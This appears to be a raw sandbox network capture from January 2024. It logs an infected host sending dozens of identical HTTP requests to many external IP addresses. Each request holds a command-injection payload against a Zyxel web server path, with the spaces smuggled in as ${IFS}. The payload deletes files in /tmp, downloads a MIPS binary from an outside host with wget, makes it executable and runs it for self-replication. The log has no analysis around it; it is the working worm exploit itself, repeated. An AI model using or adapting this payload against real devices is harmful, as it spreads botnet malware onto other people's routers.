                                                Jan 28, 2024 10:16:03.559896946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                432192.168.2.2340236102.21.198.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:03.559940100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                433192.168.2.2336752205.75.197.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:03.559963942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                434192.168.2.2346400102.189.84.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:03.559964895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                435192.168.2.235201838.41.43.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:03.559989929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                436192.168.2.2356216216.7.57.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:03.560009956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                437192.168.2.2335154177.142.124.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:03.560034037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                438192.168.2.23514501.137.135.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:03.560055017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                439192.168.2.2344928132.207.215.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:03.560108900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                440192.168.2.234063444.214.148.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:03.560180902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                441192.168.2.2345342163.249.168.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:03.560189962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                442192.168.2.2343486210.234.254.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:03.560213089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                443192.168.2.235287068.26.144.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:03.560226917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                444192.168.2.2347432108.121.37.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:03.560254097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                445192.168.2.234889235.110.92.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:04.563855886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                446192.168.2.235222423.27.44.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:04.563884020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                447192.168.2.2344658121.172.165.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:04.563924074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                448192.168.2.2347014112.165.62.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:04.563988924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                449192.168.2.2347174193.197.113.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:04.563988924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                450192.168.2.2350330198.178.219.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:04.564007044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                451192.168.2.2357350100.153.130.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:04.564044952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                452192.168.2.2350128162.213.156.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:04.564090967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                453192.168.2.235194818.106.195.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:04.564114094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                454192.168.2.233532875.251.254.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:04.564143896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                455192.168.2.2350862153.106.228.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:04.564296007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                456192.168.2.2344482133.156.103.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:05.566920996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                457192.168.2.2346454176.126.48.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:05.566953897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                458192.168.2.2349594126.99.95.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:05.566977024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                459192.168.2.2341720117.125.44.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:06.569773912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                460192.168.2.2342058103.222.162.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:06.569799900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                461192.168.2.2353604141.97.22.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:06.569820881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                462192.168.2.2335652178.51.96.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:06.569832087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                463192.168.2.2340696221.124.245.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:06.569852114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                464192.168.2.2353990222.175.101.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:06.569916010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                465192.168.2.23444725.182.198.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:07.573172092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                466192.168.2.2350362173.222.138.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:07.573224068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                467192.168.2.235656696.88.153.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:07.573242903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                468192.168.2.2355584109.44.253.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:07.573295116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                469192.168.2.233687067.85.82.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:07.573309898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                470192.168.2.2347154102.47.204.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:07.573374033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                471192.168.2.2345078196.90.51.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:07.573404074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                472192.168.2.233333267.71.9.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:07.573446035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                473192.168.2.233486827.223.203.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:07.573483944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                474192.168.2.2346978130.69.164.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:07.573545933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                475192.168.2.2351174103.137.28.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:07.573615074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                476192.168.2.2337034163.32.189.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:07.573616028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                477192.168.2.2343000207.244.110.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:07.573684931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                478192.168.2.2360614166.136.220.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:07.573707104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                479192.168.2.234870664.29.66.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:07.573708057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                480192.168.2.233673892.204.240.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:07.573751926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                481192.168.2.234480089.192.114.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:07.573765993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                482192.168.2.2341912115.82.150.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:07.573798895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                483192.168.2.233510872.30.40.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:08.576924086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                484192.168.2.2342354187.164.48.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:08.576961040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                485192.168.2.233961283.200.224.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:08.576971054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                486192.168.2.2345746219.115.38.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:08.576994896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                487192.168.2.2350534199.111.20.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:08.577022076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                488192.168.2.2334542180.99.108.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:08.577044964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                489192.168.2.2358424217.98.248.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:09.580916882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                490192.168.2.233956094.84.221.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.587043047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                491192.168.2.2337852219.70.26.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.587059021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                492192.168.2.2348878173.84.119.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.587094069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                493192.168.2.234201612.19.166.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.587097883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
